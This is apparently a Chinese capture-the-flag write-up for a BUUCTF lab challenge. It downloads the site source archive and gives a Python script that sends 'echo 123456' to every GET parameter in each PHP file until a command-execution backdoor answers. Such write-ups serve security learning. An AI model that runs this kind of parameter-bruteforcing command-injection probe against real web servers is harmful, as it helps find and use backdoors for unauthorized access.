通过提示 访问 3587a797-75c1-4463-8061-9cb9187d73fd.node4.buuoj.cn:81/www.tar.gz 即可下载到一个src文件但是里面存在很多杂乱的php文件,我们需要从中获取有用的文件
于是可以利用到脚本扫描指定路径下可疑的文件
import re
import os
import requests
files = os.listdir(r'D:\stduy\111\src') #获取路径下的所有文件
reg = re.compile(r'(?<=_GET\[\').*(?=\'\])') #设置正则
for i in files: #从第一个文件开始
url = "http://3587a797-75c1-4463-8061-9cb9187d73fd.node4.buuoj.cn:81/" + i
f = open(r"D:\stduy\111\src/"+i,encoding='UTF-8') #打开这个文件
data = f.read() #读取文件内容
f.close() #关闭文件
result = reg.findall(data) #从文件中找到GET请求
for j in result: #从第一个GET参数开始
payload = url + "?" + j + "=echo 123456" ##尝试请求次路径,并执行命令
print(payload) #输出payload
html = requests.get(payload) #获取返回内容
if "123456" in html.text:
print("就是它了!:") #判断返回内容有123456的及可以利用
print(payload)
exit(1)